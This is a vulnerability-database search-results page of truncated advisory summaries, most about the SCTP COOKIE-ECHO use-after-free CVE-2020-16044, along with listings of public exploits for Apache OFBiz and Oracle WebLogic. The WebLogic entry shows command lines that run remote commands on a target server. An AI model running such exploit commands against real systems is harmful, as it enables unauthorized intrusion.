4151 matches found
PT-2024-11103 · Linux · Linux Kernel
Name of the Vulnerable Software and Affected Versions: Linux kernel (affected versions not specified). Description: The issue is caused by a transport use-after-free problem in the Linux kernel's SCTP implementation. When processing a duplicate COOKIE-ECHO chunk in sctp_sf_do_dupcook_a, both...
EulerOS 2.0 SP3 : bash (EulerOS-SA-2021-1765)
According to the version of the bash package installed, the EulerOS installation on the remote host is affected by the following vulnerability: - A heap-based buffer overflow exists in GNU Bash before 4.3 when wide characters, not supported by the current locale set in the LC_CTYPE environment...
GO-2021-0051 Directory traversal on Windows in github.com/labstack/echo/v4
Due to improper sanitization of user input on Windows, the static file handler allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read...
The vulnerability affects the implementation of the COOKIE-ECHO extension for WebRTC browsers such as Google Chrome, Mozilla Firefox, Firefox ESR, and Firefox for Android. This vulnerability allows a perpetrator to cause a service failure or execute arbitrary code.
The vulnerability of the COOKIE-ECHO extension implementation in WebRTC browsers such as Google Chrome, Mozilla Firefox, Firefox ESR, and Firefox for Android is related to the use of memory after it is freed. Exploiting this vulnerability can allow a remote attacker to cause a service failure or...
Exploit for Deserialization of Untrusted Data in Apache Ofbiz
CVE-2021-26295-POC This example demonstrates exploiting the C...
Exploit for CVE-2020-14882
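CVE-2020-14882ALL CVE-2020-14882ALL is a comprehensive exploitation tool that supports command-echo detection, batch command echo, no-echo command execution via an external XML file, and other functions. Required modules: requests, http.client (The tool is for authorized security testing only; do not use it illegally. The author bears no responsibility for violations.) Versions on which the command-echo module is known to succeed: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 Options Function 1: command echo python3 CVE-2020-14882ALL.py -u http://1.1.1.1:7001 -c "net user" python3 CVE-2020-14882ALL.py -u...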
CentOS 8 : thunderbird (CESA-2021:0089)
The remote CentOS Linux 8 host has a package installed that is affected by a vulnerability as referenced in the CESA-2021:0089 advisory. - Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk CVE-2020-16044 Note that Nessus has not tested for this issue but has instead...
HosTaGe - Low Interaction Mobile Honeypot
HosTaGe is a lightweight, low-interaction, portable, and generic honeypot for mobile devices that aims at the detection of malicious wireless network environments. As most malware propagates over the network via specific protocols, a low-interaction honeypot located at a mobile device can check...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
CentOS 7 : thunderbird (RHSA-2021:0087)
The remote CentOS Linux 7 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2021:0087 advisory. - Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
CentOS 7 : firefox (RHSA-2021:0053)
The remote CentOS Linux 7 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2021:0053 advisory. - Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
MGASA-2021-0027 Updated thunderbird packages fix a security vulnerability
Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk. CVE-2020-16044 See upstream release notes for other changes...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
SUSE SLED15 / SLES15 Security Update : MozillaFirefox (SUSE-SU-2021:0072-1)
This update for MozillaFirefox fixes the following issues : Firefox Extended Support Release 78.6.1 ESR - Fixed: Critical security issue MFSA 2021-01 bsc1180623 - CVE-2020-16044 Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk Note that Tenable Network Security has extracted...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...
Critical: Red Hat Security Advisory: firefox security update
An update for firefox is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from th...
Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk
Use after free in WebRTC in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet...